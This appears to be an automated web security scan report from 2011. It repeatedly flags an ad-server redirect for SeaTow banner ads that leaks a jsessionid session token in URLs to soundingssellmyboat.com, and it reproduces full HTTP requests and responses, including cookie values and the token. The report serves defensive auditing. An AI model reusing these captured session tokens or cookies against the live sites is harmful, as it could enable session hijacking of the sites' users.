GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

